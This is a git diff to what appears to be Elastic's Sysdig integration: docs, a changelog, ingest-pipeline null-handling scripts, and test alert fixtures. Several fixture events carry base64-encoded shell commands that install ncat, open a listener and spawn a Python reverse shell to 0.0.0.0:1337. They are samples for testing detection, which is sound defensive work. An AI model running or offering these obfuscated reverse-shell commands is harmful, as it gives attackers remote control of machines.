diff --git a/packages/sysdig/_dev/build/docs/README.md b/packages/sysdig/_dev/build/docs/README.md index e5cddbb5c0c..d559e894c29 100644 --- a/packages/sysdig/_dev/build/docs/README.md +++ b/packages/sysdig/_dev/build/docs/README.md @@ -26,6 +26,11 @@ Elastic Agent must be installed. For more details, check the Elastic Agent [inst Sysdig must be configured to output alerts to a supported output channel as defined in [Setup](#setup). The system will only receive common fields output by Sysdig's rules, meaning that if a rule does not include a desired field the rule must be edited in Sysdig to add the field. +## Agentless Enabled Integration + +Agentless integrations allow you to collect data without having to manage Elastic Agent in your cloud. They make manual agent deployment unnecessary, so you can focus on your data instead of the agent that collects it. For more information, refer to [Agentless integrations](https://www.elastic.co/guide/en/serverless/current/security-agentless-integrations.html) and the [Agentless integrations FAQ](https://www.elastic.co/guide/en/serverless/current/agentless-integration-troubleshooting.html). +Agentless deployments are only supported in Elastic Serverless and Elastic Cloud environments. This functionality is in beta and is subject to change. Beta features are not subject to the support SLA of official GA features. + ## Setup For step-by-step instructions on how to set up an integration, see the [Getting started](https://www.elastic.co/guide/en/starting-with-the-elasticsearch-platform-and-its-solutions/current/getting-started-observability.html) guide. diff --git a/packages/sysdig/changelog.yml b/packages/sysdig/changelog.yml index 77a249febc5..a36280ce435 100644 --- a/packages/sysdig/changelog.yml +++ b/packages/sysdig/changelog.yml @@ -1,4 +1,12 @@ # newer versions go on top +- version: "2.4.0" + changes: + - description: Enable Agentless deployment. + type: enhancement + link: https://github.com/elastic/integrations/pull/19470 + - description: Fix handling of null values in string for event data stream. + type: bugfix + link: https://github.com/elastic/integrations/pull/1 - version: "2.3.0" changes: - description: Enable request trace log removal. diff --git a/packages/sysdig/data_stream/event/_dev/test/pipeline/test-event.log b/packages/sysdig/data_stream/event/_dev/test/pipeline/test-event.log index f7c308133e9..12f8f8cbb5a 100644 --- a/packages/sysdig/data_stream/event/_dev/test/pipeline/test-event.log +++ b/packages/sysdig/data_stream/event/_dev/test/pipeline/test-event.log @@ -4,3 +4,5 @@ {"actions":[{"afterEventNs":30000000000,"beforeEventNs":15000000000,"errMsg":"maximum number of outstanding captures (1) reached","isSuccessful":false,"token":"7d30b372-3dd9-1234-5678-403612345678","type":"capture"}],"category":"runtime","content":{"fields":{"container.id":"382abcdefd0a","container.image.repository":"gcr.io/cadvisor/cadvisor","container.image.tag":"v0.45.0","container.mounts":"/:/rootfs::false:private,/var/run:/var/run::false:private,/sys:/sys::false:private,/var/lib/docker:/var/lib/docker::false:private,/dev/disk:/dev/disk::false:private,/var/lib/kubelet/pods/e08484f0-c944-4b62-bdb3-9341e74ef7b5/etc-hosts:/etc/hosts::true:private,/var/lib/kubelet/pods/e08484f0-c944-4b62-bdb3-9341e74ef7b5/containers/cadvisor/e5f5ac18:/dev/termination-log::true:private","container.name":"cadvisor","evt.res":"SUCCESS","evt.type":"execve","group.gid":"0","group.name":"root","proc.cmdline":"cadvisor -logtostderr --enable_metrics=cpu,diskIO,memory,network,oom_event --docker_only","proc.cwd":"/","proc.exepath":"/usr/bin/cadvisor","proc.name":"cadvisor","proc.pcmdline":"runc --root /run/containerd/runc/k8s.io --log /run/containerd/io.containerd.runtime.v2.task/k8s.io/382e35271d0a388267e9ed7ab262e0735ebfbaa1fd5dc09a3645d7b22e62580a/log.json --log-format json --systemd-cgroup create --bundle /run/containerd/io.containerd.runtime.v2.task/k8s.io/382e35271d0a388267e9ed7ab262e0735ebfbaa1fd5dc09a3645d7b22e62580a --pid-file /run/containerd/io.containerd.runtime.v2.task/k8s.io/382e35271d0a388267e9ed7ab262e0735ebfbaa1fd5dc09a3645d7b22e62580a/init.pid 382e35271d0a388267e9ed7ab262e0735ebfbaa1fd5dc09a3645d7b22e62580a","proc.pid":"741051","proc.pname":"runc","proc.ppid":"741043","proc.sid":"1","user.loginname":"","user.loginuid":"-1","user.name":"root","user.uid":"0"},"origin":"Sysdig","output":"Container cadvisor having image gcr.io/cadvisor/cadvisor with sensitive mount started by user root and parent runc (proc.name=cadvisor image=gcr.io/cadvisor/cadvisor:v0.45.0 proc.exepath=/usr/bin/cadvisor proc.pname=runc gparent=containerd-shim ggparent=systemd gggparent= mounts=/:/rootfs::false:private,/var/run:/var/run::false:private,/sys:/sys::false:private,/var/lib/docker:/var/lib/docker::false:private,/dev/disk:/dev/disk::false:private,/var/lib/kubelet/pods/e08484f0-c944-4b62-bdb3-9341e74ef7b5/etc-hosts:/etc/hosts::true:private,/var/lib/kubelet/pods/e08484f0-c944-4b62-bdb3-9341e74ef7b5/containers/cadvisor/e5f5ac18:/dev/termination-log::true:private evt.type=execve evt.res=SUCCESS proc.pid=741051 proc.cwd=/ proc.ppid=741043 proc.pcmdline=runc --root /run/containerd/runc/k8s.io --log /run/containerd/io.containerd.runtime.v2.task/k8s.io/382e35271d0a388267e9ed7ab262e0735ebfbaa1fd5dc09a3645d7b22e62580a/log.json --log-format json --systemd-cgroup create --bundle /run/containerd/io.containerd.runtime.v2.task/k8s.io/382e35271d0a388267e9ed7ab262e0735ebfbaa1fd5dc09a3645d7b22e62580a --pid-file /run/containerd/io.containerd.runtime.v2.task/k8s.io/382e35271d0a388267e9ed7ab262e0735ebfbaa1fd5dc09a3645d7b22e62580a/init.pid 382e35271d0a388267e9ed7ab262e0735ebfbaa1fd5dc09a3645d7b22e62580a proc.sid=1 user.loginuid=-1 user.uid=0 user.loginname= group.gid=0 group.name=root container.id=382e35271d0a container.name=cadvisor)","policyId":10011701,"ruleName":"Launch Sensitive Mount Container","ruleSubType":0,"ruleTags":["container","container_best_practices","container_immutability","SOC2","SOC2_CC6.1","NIST","NIST_800-190","NIST_800-190_3.4.3","NIST_800-190_3.5.5","NIST_800-53","NIST_800-53_AC-6(9)","NIST_800-53_AC-6(10)","NIST_800-53_AU-6(8)","ISO","ISO_27001","ISO_27001_A.9.2.3","HIPAA","HIPAA_164.308(a)","HIPAA_164.312(a)","HIPAA_164.312(b)","HITRUST","HITRUST_CSF","HITRUST_CSF_01.c","HITRUST_CSF_09.aa","GDPR","GDPR_32.1","GDPR_32.2","MITRE","MITRE_T1609_container_administration_command","MITRE_T1611_escape_to_host","MITRE_TA0002_execution","MITRE_TA0004_privilege_escalation","MITRE_TA0008_lateral_movement","MITRE_T1610_deploy_container","MITRE_TA0005_defense_evasion","MITRE_T1055.009_process_injection_proc_memory","MITRE_T1543_create_or_modify_system_process","CIS","oss"],"ruleType":6,"type":"workloadRuntimeDetection"},"description":"This Notable Events policy contains rules which may indicate undesired behavior including security threats. The rules are more generalized than Threat Detection policies and may result in more noise. Tuning will likely be required for the events generated from this policy.","engine":"falco","id":"1836ac8550123456789abcdefe5d827f","labels":{"container.image.digest":"sha256:9360d7421c5e9b646ea13e5ced3f8e6da80017b0144733a04b7401dd8c01a5cb","container.image.id":"3f3e5f568a6d","container.image.repo":"gcr.io/cadvisor/cadvisor","container.image.tag":"v0.45.0","container.label.io.kubernetes.container.name":"cadvisor","container.label.io.kubernetes.pod.name":"wave-autoscale-agent-abcde","container.label.io.kubernetes.pod.namespace":"wave-autoscale","container.name":"cadvisor","host.hostName":"hybrid-node","host.mac":"01:00:5e:90:10:02","kubernetes.cluster.name":"myclusterName","kubernetes.namespace.name":"wave-autoscale","kubernetes.node.name":"node04","kubernetes.pod.name":"wave-autoscale-agent-abcde"},"name":"Sysdig Runtime Notable Events","originator":"policy","rawEventCategory":"runtime","rawEventOriginator":"linuxAgent","severity":5,"source":"syscall","sourceDetails":{"subType":"container","type":"workload"},"timestamp":1744701225528350000} {"category":"runtime","content":{"fields":{"container.id":"4db57cd1354c","container.name":"shell-scripting","group.gid":"0","group.name":"root","proc.cmdline":"bash -c echo IyEvYmluL2Jhc2gKYXB0IHVwZGF0ZSAteTsgYXB0IGluc3RhbGwgLXkgbmNhdApuYyAtbHYgMTMzNyAmCg== | base64 -d | sh; echo cHl0aG9uMyAtYyAnaW1wb3J0IG9zLHB0eSxzb2NrZXQ7cz1zb2NrZXQuc29ja2V0KCk7cy5jb25uZWN0KCgiMC4wLjAuMCIsMTMzNykpO1tvcy5kdXAyKHMuZmlsZW5vKCksZilmb3IgZiBpbigwLDEsMildO3B0eS5zcGF3bihbInNoIiwgIi1jIiwgInNsZWVwIDU7bHMgLWE7IGV4aXQgMCJdKScK | base64 -d | sh","proc.cwd":"/","proc.exepath":"/usr/bin/bash","proc.hash.sha256":"7ebfc53f17925af4340d4218aafd16ba39b5afa8b6ac1f7adc3dd92952a2a237","proc.name":"bash","proc.pcmdline":"runc --root /run/containerd/runc/k8s.io --log /run/containerd/io.containerd.runtime.v2.task/k8s.io/4db57cd1354c54c52c52af44b6e872f23e1d70428602efe1b0b0dc39ec53e3fe/log.json --log-format json --systemd-cgroup create --bundle /run/containerd/io.containerd.runtime.v2.task/k8s.io/4db57cd1354c54c52c52af44b6e872f23e1d70428602efe1b0b0dc39ec53e3fe --pid-file /run/containerd/io.containerd.runtime.v2.task/k8s.io/4db57cd1354c54c52c52af44b6e872f23e1d70428602efe1b0b0dc39ec53e3fe/init.pid 4db57cd1354c54c52c52af44b6e872f23e1d70428602efe1b0b0dc39ec53e3fe","proc.pid":"97888","proc.pname":"runc","proc.ppid":"97881","proc.sid":"1","user.loginname":"","user.loginuid":"-1","user.name":"root","user.uid":"0"},"origin":"Sysdig","output":"Potentially malicious Shell script base64-encoded under user root on shell-scripting (proc.name=bash proc.exepath=/usr/bin/bash proc.pname=runc gparent=containerd-shim ggparent=containerd-shim gggparent=containerd proc.cmdline=bash -c echo IyEvYmluL2Jhc2gKYXB0IHVwZGF0ZSAteTsgYXB0IGluc3RhbGwgLXkgbmNhdApuYyAtbHYgMTMzNyAmCg== | base64 -d | sh; echo cHl0aG9uMyAtYyAnaW1wb3J0IG9zLHB0eSxzb2NrZXQ7cz1zb2NrZXQuc29ja2V0KCk7cy5jb25uZWN0KCgiMC4wLjAuMCIsMTMzNykpO1tvcy5kdXAyKHMuZmlsZW5vKCksZilmb3IgZiBpbigwLDEsMildO3B0eS5zcGF3bihbInNoIiwgIi1jIiwgInNsZWVwIDU7bHMgLWE7IGV4aXQgMCJdKScK | base64 -d | sh user.name=root proc.pid=97888 proc.cwd=/ proc.ppid=97881 proc.pcmdline=runc --root /run/containerd/runc/k8s.io --log /run/containerd/io.containerd.runtime.v2.task/k8s.io/4db57cd1354c54c52c52af44b6e872f23e1d70428602efe1b0b0dc39ec53e3fe/log.json --log-format json --systemd-cgroup create --bundle /run/containerd/io.containerd.runtime.v2.task/k8s.io/4db57cd1354c54c52c52af44b6e872f23e1d70428602efe1b0b0dc39ec53e3fe --pid-file /run/containerd/io.containerd.runtime.v2.task/k8s.io/4db57cd1354c54c52c52af44b6e872f23e1d70428602efe1b0b0dc39ec53e3fe/init.pid 4db57cd1354c54c52c52af44b6e872f23e1d70428602efe1b0b0dc39ec53e3fe proc.sid=1 user.uid=0 user.loginuid=-1 user.loginname= group.gid=0 group.name=root container.id=4db57cd1354c container.name=shell-scripting)","policyId":10011698,"ruleName":"Base64-encoded Shell Script Execution","ruleSubType":0,"ruleTags":["host","container","MITRE","MITRE_T1132.001_data_encoding_standard_encoding","MITRE_TA0011_command_and_control","MITRE_TA0005_defense_evasion","MITRE_T1059.004_command_and_scripting_interpreter_unix_shell","MITRE_T1059_command_and_scripting_interpreter","MITRE_TA0002_execution","MITRE_T1027_obfuscated_files_and_information","MITRE_T1140_deobfuscate_decode_files_or_information"],"ruleType":6,"type":"workloadRuntimeDetection"},"description":"This policy contains rules which Sysdig considers High Confidence of a security incident. They are tightly coupled to common attacker TTP's. They have been designed to minimize false positives but may still result in some depending on your environment.","engine":"falco","id":"183a5e0123456789zbcdef400ba6d116","labels":{"cloudProvider.account.id":"012345678912","cloudProvider.name":"gcp","cloudProvider.region":"us-central1","container.image.digest":"sha256:aa7b73608abcfb021247bbb4c111435234a0459298a6da610681097a54ca2c2a","container.image.id":"ef0f72a55bd2","container.image.repo":"docker.io/library/python","container.image.tag":"3.9.18-slim","container.label.io.kubernetes.container.name":"shell-scripting","container.label.io.kubernetes.pod.name":"shell-scripting-1234567-12345","container.label.io.kubernetes.pod.namespace":"default","container.name":"shell-scripting","gcp.location":"us-central1","gcp.projectId":"012345678912","host.hostName":"gke-cluster-gcp-demo-san-default-pool-12345678-1234","host.mac":"01:00:5e:90:10:00","kubernetes.cluster.name":"gke-alliances-demo-6","kubernetes.cronJob.name":"shell-scripting","kubernetes.job.name":"shell-scripting-29082780","kubernetes.namespace.name":"default","kubernetes.node.name":"gke-cluster-gcp-demo-san-default-pool-12345678-1234","kubernetes.pod.name":"shell-scripting-00123450-abcd5","kubernetes.workload.name":"shell-scripting","kubernetes.workload.type":"cronjob"},"name":"Sysdig Runtime Threat Detection","originator":"policy","rawEventCategory":"runtime","rawEventOriginator":"linuxAgent","severity":3,"source":"syscall","sourceDetails":{"subType":"container","type":"workload"},"timestamp":1744966800841090300} {"category":"runtime","content":{"fields":{"container.image.repository":"docker.io/library/python","container.name":"shell-scripting","evt.res":"SUCCESS","evt.type":"execve","group.gid":"0","group.name":"root","proc.args":"","proc.cmdline":"sh","proc.cwd":"/","proc.exepath":"/usr/bin/dash","proc.hash.sha256":"f5adb8bf0100ed0f8c7782ca5f92814e9229525a4b4e0d401cf3bea09ac960a6","proc.name":"sh","proc.pcmdline":"bash -c echo IyEvYmluL2Jhc2gKYXB0IHVwZGF0ZSAteTsgYXB0IGluc3RhbGwgLXkgbmNhdApuYyAtbHYgMTMzNyAmCg== | base64 -d | sh; echo cHl0aG9uMyAtYyAnaW1wb3J0IG9zLHB0eSxzb2NrZXQ7cz1zb2NrZXQuc29ja2V0KCk7cy5jb25uZWN0KCgiMC4wLjAuMCIsMTMzNykpO1tvcy5kdXAyKHMuZmlsZW5vKCksZilmb3IgZiBpbigwLDEsMildO3B0eS5zcGF3bihbInNoIiwgIi1jIiwgInNsZWVwIDU7bHMgLWE7IGV4aXQgMCJdKScK | base64 -d | sh","proc.pid":"4094247","proc.pid.ts":"1744772461104588229","proc.pname":"bash","proc.ppid":"4093769","proc.ppid.ts":"1744772400850031947","proc.sid":"1","user.loginname":"","user.loginuid":"-1","user.name":"root","user.uid":"0"},"origin":"Secure UI","output":"Custom rule. The shell-scripting with image docker.io/library/python by parent bash under user root (proc.name=sh proc.exepath-custom=/usr/bin/dash proc.pname=bash gparent=containerd-shim ggparent= gggparent= image=docker.io/library/python user.uid=0 proc.cmdline=sh proc.pcmdline=bash -c echo IyEvYmluL2Jhc2gKYXB0IHVwZGF0ZSAteTsgYXB0IGluc3RhbGwgLXkgbmNhdApuYyAtbHYgMTMzNyAmCg== | base64 -d | sh; echo cHl0aG9uMyAtYyAnaW1wb3J0IG9zLHB0eSxzb2NrZXQ7cz1zb2NrZXQuc29ja2V0KCk7cy5jb25uZWN0KCgiMC4wLjAuMCIsMTMzNykpO1tvcy5kdXAyKHMuZmlsZW5vKCksZilmb3IgZiBpbigwLDEsMildO3B0eS5zcGF3bihbInNoIiwgIi1jIiwgInNsZWVwIDU7bHMgLWE7IGV4aXQgMCJdKScK | base64 -d | sh user.name=root user.loginuid=-1 proc.args= container.name=shell-scripting evt.type=execve evt.res=SUCCESS proc.pid=4094247 proc.cwd=/ proc.ppid=4093769 proc.sid=1 proc.exepath=/usr/bin/dash user.loginname= group.gid=0 group.name=root proc.pid.ts=1744772461104588229 proc.ppid.ts=1744772400850031947 proc.hash.sha256=f5adb8bf0100ed0f8c7782ca5f92814e9229525a4b4e0d401cf3bea09ac960a6)","policyId":10569534,"ruleName":"My test rule custom","ruleSubType":0,"ruleTags":["My-tag-custom-1-hello-world","MITTRE-WHATEVER"],"ruleType":6,"type":"workloadRuntimeDetection"},"description":"This is just a dumb policy to test custom policies","engine":"falco","id":"1a36a012345678998765432108f1e03e","labels":{"cloudProvider.account.id":"012345678912","cloudProvider.name":"gcp","cloudProvider.region":"us-central1","container.image.digest":"sha256:aa7b73608abcfb021247bbb4c111435234a0459298a6da610681097a54ca2c2a","container.image.id":"ef0f72a55bd2","container.image.repo":"docker.io/library/python","container.image.tag":"3.9.18-slim","container.label.io.kubernetes.container.name":"shell-scripting","container.label.io.kubernetes.pod.name":"shell-scripting-29079540-cqf5n","container.label.io.kubernetes.pod.namespace":"default","container.name":"shell-scripting","gcp.location":"us-central1","gcp.projectId":"012345678912","host.hostName":"gke-cluster-gcp-demo-san-default-pool-12345678-abcd","host.mac":"01:00:5e:90:10:00","kubernetes.cluster.name":"gke-alliances-demo-6","kubernetes.cronJob.name":"shell-scripting","kubernetes.job.name":"shell-scripting-29079540","kubernetes.namespace.name":"default","kubernetes.node.name":"gke-cluster-gcp-demo-san-default-pool-12345678-abcd","kubernetes.pod.name":"shell-scripting-12345678-abcde","kubernetes.workload.name":"shell-scripting","kubernetes.workload.type":"cronjob"},"name":"Manuel test policy","originator":"policy","rawEventCategory":"runtime","rawEventOriginator":"linuxAgent","severity":4,"source":"syscall","sourceDetails":{"subType":"container","type":"workload"},"timestamp":1744772461195149800} +{"category":"runtime","content":{"fields":{"container.image.repository":"docker.io/manuelbcd/py-goat","container.name":"client","evt.type":"execve","fd.cport":"","fd.name":"","fd.sport":"","proc.cmdline":"g++ -c -I./liblinear -I./liblua payload.cc -o payload.o","proc.name":"g++","proc.pid":"{}","proc.ppid":"","proc.pid.ts":"1779960622186767074","proc.pname":"make","proc.ppid.ts":"1779960534106633936","proc.sid":"","user.loginname":"","user.loginuid":"-1","user.name":"root","user.uid":"0"},"origin":"Sysdig","policyId":10011704,"ruleName":"Launch Code Compiler Tool in Container","ruleSubType":0,"ruleTags":["container"],"ruleType":6,"type":"workloadRuntimeDetection"},"engine":"falco","id":"18b3b0c157a37ff81ee0ffde058bb9c7","labels":{},"name":"Sysdig Runtime Activity Logs","originator":"policy","rawEventCategory":"runtime","rawEventOriginator":"linuxAgent","severity":7,"source":"syscall","sourceDetails":{"subType":"container","type":"workload"},"timestamp":1779960622186987500} +{"category":"runtime","content":{"fields":{"container.name":"client","evt.type":"execve","proc.cmdline":"g++ -c","proc.name":"g++","proc.pid.ts":"1779968132639147461","proc.pname":"make","proc.ppid.ts":"1779968024206444718","user.name":"root","user.uid":"0"},"origin":"Sysdig","output":"Detected a code compiler g++ usage on client","policyId":10011704,"ruleName":"Launch Code Compiler Tool in Container","ruleSubType":0,"ruleTags":["container"],"ruleType":6,"type":"workloadRuntimeDetection"},"description":"Runtime activity","engine":"falco","id":"18b3b796017bece0da1278186b9f1333","labels":{"container.name":"client"},"name":"Sysdig Runtime Activity Logs","originator":"policy","rawEventCategory":"runtime","rawEventOriginator":"linuxAgent","severity":7,"source":"syscall","sourceDetails":{"subType":"container","type":"workload"},"timestamp":1779968132639354000} diff --git a/packages/sysdig/data_stream/event/_dev/test/pipeline/test-event.log-expected.json b/packages/sysdig/data_stream/event/_dev/test/pipeline/test-event.log-expected.json index fd8bb28f399..de3cdc7c7aa 100644 --- a/packages/sysdig/data_stream/event/_dev/test/pipeline/test-event.log-expected.json +++ b/packages/sysdig/data_stream/event/_dev/test/pipeline/test-event.log-expected.json @@ -1621,6 +1621,223 @@ "id": "0", "name": "root" } + }, + { + "@timestamp": "2026-05-28T09:30:22.1869875Z", + "container": { + "image": { + "name": "docker.io/manuelbcd/py-goat" + }, + "name": "client" + }, + "ecs": { + "version": "8.17.0" + }, + "event": { + "category": [ + "process" + ], + "id": "18b3b0c157a37ff81ee0ffde058bb9c7", + "kind": "event", + "original": "{\"category\":\"runtime\",\"content\":{\"fields\":{\"container.image.repository\":\"docker.io/manuelbcd/py-goat\",\"container.name\":\"client\",\"evt.type\":\"execve\",\"fd.cport\":\"\",\"fd.name\":\"\",\"fd.sport\":\"\",\"proc.cmdline\":\"g++ -c -I./liblinear -I./liblua payload.cc -o payload.o\",\"proc.name\":\"g++\",\"proc.pid\":\"{}\",\"proc.ppid\":\"\",\"proc.pid.ts\":\"1779960622186767074\",\"proc.pname\":\"make\",\"proc.ppid.ts\":\"1779960534106633936\",\"proc.sid\":\"\",\"user.loginname\":\"\",\"user.loginuid\":\"-1\",\"user.name\":\"root\",\"user.uid\":\"0\"},\"origin\":\"Sysdig\",\"policyId\":10011704,\"ruleName\":\"Launch Code Compiler Tool in Container\",\"ruleSubType\":0,\"ruleTags\":[\"container\"],\"ruleType\":6,\"type\":\"workloadRuntimeDetection\"},\"engine\":\"falco\",\"id\":\"18b3b0c157a37ff81ee0ffde058bb9c7\",\"labels\":{},\"name\":\"Sysdig Runtime Activity Logs\",\"originator\":\"policy\",\"rawEventCategory\":\"runtime\",\"rawEventOriginator\":\"linuxAgent\",\"severity\":7,\"source\":\"syscall\",\"sourceDetails\":{\"subType\":\"container\",\"type\":\"workload\"},\"timestamp\":1779960622186987500}", + "provider": "syscall", + "severity": 7, + "type": [ + "info" + ] + }, + "observer": { + "product": "Sysdig Secure", + "vendor": "Sysdig" + }, + "process": { + "command_line": "g++ -c -I./liblinear -I./liblua payload.cc -o payload.o", + "name": "g++", + "parent": { + "name": "make", + "start": "2026-05-28T09:28:54.106633936Z" + }, + "start": "2026-05-28T09:30:22.186767074Z" + }, + "related": { + "user": [ + "root", + "0" + ] + }, + "rule": { + "name": "Launch Code Compiler Tool in Container", + "ruleset": "Sysdig Runtime Activity Logs" + }, + "sysdig": { + "event": { + "category": "runtime", + "content": { + "fields": { + "container": { + "image": { + "repository": "docker.io/manuelbcd/py-goat" + }, + "name": "client" + }, + "evt": { + "type": "execve" + }, + "proc": { + "cmdline": "g++ -c -I./liblinear -I./liblua payload.cc -o payload.o", + "name": "g++", + "pid_ts": "2026-05-28T09:30:22.186767074Z", + "pname": "make", + "ppid_ts": "2026-05-28T09:28:54.106633936Z" + }, + "user": { + "name": "root", + "uid": "0" + } + }, + "origin": "Sysdig", + "policy_id": "10011704", + "rule_name": "Launch Code Compiler Tool in Container", + "rule_sub_type": 0, + "rule_tags": [ + "container" + ], + "rule_type": 6, + "type": "workloadRuntimeDetection" + }, + "engine": "falco", + "id": "18b3b0c157a37ff81ee0ffde058bb9c7", + "name": "Sysdig Runtime Activity Logs", + "originator": "policy", + "raw_event_category": "runtime", + "raw_event_originator": "linuxAgent", + "severity": 7, + "severity_value": "Info", + "source": "syscall", + "source_details": { + "sub_type": "container", + "type": "workload" + }, + "timestamp": "2026-05-28T09:30:22.1869875Z" + } + }, + "tags": [ + "preserve_duplicate_custom_fields" + ], + "user": { + "id": "0", + "name": "root" + } + }, + { + "@timestamp": "2026-05-28T11:35:32.639354Z", + "container": { + "name": "client" + }, + "ecs": { + "version": "8.17.0" + }, + "event": { + "category": [ + "process" + ], + "id": "18b3b796017bece0da1278186b9f1333", + "kind": "event", + "original": "{\"category\":\"runtime\",\"content\":{\"fields\":{\"container.name\":\"client\",\"evt.type\":\"execve\",\"proc.cmdline\":\"g++ -c\",\"proc.name\":\"g++\",\"proc.pid.ts\":\"1779968132639147461\",\"proc.pname\":\"make\",\"proc.ppid.ts\":\"1779968024206444718\",\"user.name\":\"root\",\"user.uid\":\"0\"},\"origin\":\"Sysdig\",\"output\":\"Detected a code compiler g++ usage on client\",\"policyId\":10011704,\"ruleName\":\"Launch Code Compiler Tool in Container\",\"ruleSubType\":0,\"ruleTags\":[\"container\"],\"ruleType\":6,\"type\":\"workloadRuntimeDetection\"},\"description\":\"Runtime activity\",\"engine\":\"falco\",\"id\":\"18b3b796017bece0da1278186b9f1333\",\"labels\":{\"container.name\":\"client\"},\"name\":\"Sysdig Runtime Activity Logs\",\"originator\":\"policy\",\"rawEventCategory\":\"runtime\",\"rawEventOriginator\":\"linuxAgent\",\"severity\":7,\"source\":\"syscall\",\"sourceDetails\":{\"subType\":\"container\",\"type\":\"workload\"},\"timestamp\":1779968132639354000}", + "provider": "syscall", + "severity": 7, + "type": [ + "info" + ] + }, + "message": "Detected a code compiler g++ usage on client", + "observer": { + "product": "Sysdig Secure", + "vendor": "Sysdig" + }, + "process": { + "command_line": "g++ -c", + "name": "g++", + "parent": { + "name": "make", + "start": "2026-05-28T11:33:44.206444718Z" + }, + "start": "2026-05-28T11:35:32.639147461Z" + }, + "related": { + "user": [ + "root", + "0" + ] + }, + "rule": { + "description": "Runtime activity", + "name": "Launch Code Compiler Tool in Container", + "ruleset": "Sysdig Runtime Activity Logs" + }, + "sysdig": { + "event": { + "category": "runtime", + "content": { + "fields": { + "container": { + "name": "client" + }, + "evt": { + "type": "execve" + }, + "proc": { + "cmdline": "g++ -c", + "name": "g++", + "pid_ts": "2026-05-28T11:35:32.639147461Z", + "pname": "make", + "ppid_ts": "2026-05-28T11:33:44.206444718Z" + }, + "user": { + "name": "root", + "uid": "0" + } + }, + "origin": "Sysdig", + "output": "Detected a code compiler g++ usage on client", + "policy_id": "10011704", + "rule_name": "Launch Code Compiler Tool in Container", + "rule_sub_type": 0, + "rule_tags": [ + "container" + ], + "rule_type": 6, + "type": "workloadRuntimeDetection" + }, + "description": "Runtime activity", + "engine": "falco", + "id": "18b3b796017bece0da1278186b9f1333", + "labels": { + "container": { + "name": "client" + } + }, + "name": "Sysdig Runtime Activity Logs", + "originator": "policy", + "raw_event_category": "runtime", + "raw_event_originator": "linuxAgent", + "severity": 7, + "severity_value": "Info", + "source": "syscall", + "source_details": { + "sub_type": "container", + "type": "workload" + }, + "timestamp": "2026-05-28T11:35:32.639354Z" + } + }, + "tags": [ + "preserve_duplicate_custom_fields" + ], + "user": { + "id": "0", + "name": "root" + } } ] } diff --git a/packages/sysdig/data_stream/event/elasticsearch/ingest_pipeline/default.yml b/packages/sysdig/data_stream/event/elasticsearch/ingest_pipeline/default.yml index 3396c4b8b2d..a508bcd2c98 100644 --- a/packages/sysdig/data_stream/event/elasticsearch/ingest_pipeline/default.yml +++ b/packages/sysdig/data_stream/event/elasticsearch/ingest_pipeline/default.yml @@ -30,6 +30,33 @@ processors: - append: field: error.message value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - script: + description: Remove Sysdig null values from the parsed event JSON before any type conversion. + tag: script_remove_string_null_values_ + lang: painless + if: ctx.json != null + source: | + void handleMap(Map map) { + map.values().removeIf(v -> { + if (v instanceof Map) { + handleMap(v); + } else if (v instanceof List) { + handleList(v); + } + return v == '' || v == '{}' || (v instanceof Map && v.size() == 0) || (v instanceof List && v.size() == 0) + }); + } + void handleList(List list) { + list.removeIf(v -> { + if (v instanceof Map) { + handleMap(v); + } else if (v instanceof List) { + handleList(v); + } + return v == '' || v == '{}' || (v instanceof Map && v.size() == 0) || (v instanceof List && v.size() == 0) + }); + } + handleMap(ctx.json); - set: field: observer.vendor tag: set_observer_vendor @@ -181,6 +208,21 @@ processors: tag: rename_content_fields_proc_ppid_ts target_field: sysdig.event.content.fields.proc.ppid_ts ignore_missing: true + - script: + description: Remove empty proc.pid and proc.ppid maps left after timestamp field expansion. + tag: script_sanitize_proc_timestamp_maps + lang: painless + if: ctx.sysdig?.event?.content?.fields instanceof Map && (ctx.sysdig.event.content.fields['proc.pid.ts'] != null || ctx.sysdig.event.content.fields['proc.ppid.ts'] != null || ctx.sysdig?.event?.content?.fields?.proc?.pid_ts != null || ctx.sysdig?.event?.content?.fields?.proc?.ppid_ts != null) + source: | + if (ctx.sysdig.event.content.fields.proc instanceof Map) { + def proc = ctx.sysdig.event.content.fields.proc; + if (proc.containsKey('pid') && proc.pid instanceof Map && proc.pid.size() == 0) { + proc.remove('pid'); + } + if (proc.containsKey('ppid') && proc.ppid instanceof Map && proc.ppid.size() == 0) { + proc.remove('ppid'); + } + } - dot_expander: field: ct.user tag: dot_expander_ct_user @@ -200,6 +242,7 @@ processors: tag: dot_expander_content_fields path: sysdig.event.content.fields override: true + if: ctx.sysdig?.event?.content?.fields instanceof Map on_failure: - append: field: error.message @@ -1020,6 +1063,7 @@ processors: field: '*' tag: dot_expander_labels path: sysdig.event.labels + if: ctx.sysdig?.event?.labels instanceof Map on_failure: - append: field: error.message @@ -1477,7 +1521,7 @@ processors: } else if (v instanceof List) { handleList(v); } - return v == null || v == '' || v == '' || v == '-1' ||(v instanceof Map && v.size() == 0) || (v instanceof List && v.size() == 0) + return v == null || v == '' || v == '' || v == '-1' || v == '{}' || (v instanceof Map && v.size() == 0) || (v instanceof List && v.size() == 0) }); } void handleList(List list) { @@ -1487,7 +1531,7 @@ processors: } else if (v instanceof List) { handleList(v); } - return v == null || v == '' || v == '' || v == '-1' || (v instanceof Map && v.size() == 0) || (v instanceof List && v.size() == 0) + return v == null || v == '' || v == '' || v == '-1' || v == '{}' || (v instanceof Map && v.size() == 0) || (v instanceof List && v.size() == 0) }); } handleMap(ctx); diff --git a/packages/sysdig/docs/README.md b/packages/sysdig/docs/README.md index 016e297ab94..4b8e2481bb3 100644 --- a/packages/sysdig/docs/README.md +++ b/packages/sysdig/docs/README.md @@ -26,6 +26,11 @@ Elastic Agent must be installed. For more details, check the Elastic Agent [inst Sysdig must be configured to output alerts to a supported output channel as defined in [Setup](#setup). The system will only receive common fields output by Sysdig's rules, meaning that if a rule does not include a desired field the rule must be edited in Sysdig to add the field. +## Agentless Enabled Integration + +Agentless integrations allow you to collect data without having to manage Elastic Agent in your cloud. They make manual agent deployment unnecessary, so you can focus on your data instead of the agent that collects it. For more information, refer to [Agentless integrations](https://www.elastic.co/guide/en/serverless/current/security-agentless-integrations.html) and the [Agentless integrations FAQ](https://www.elastic.co/guide/en/serverless/current/agentless-integration-troubleshooting.html). +Agentless deployments are only supported in Elastic Serverless and Elastic Cloud environments. This functionality is in beta and is subject to change. Beta features are not subject to the support SLA of official GA features. + ## Setup For step-by-step instructions on how to set up an integration, see the [Getting 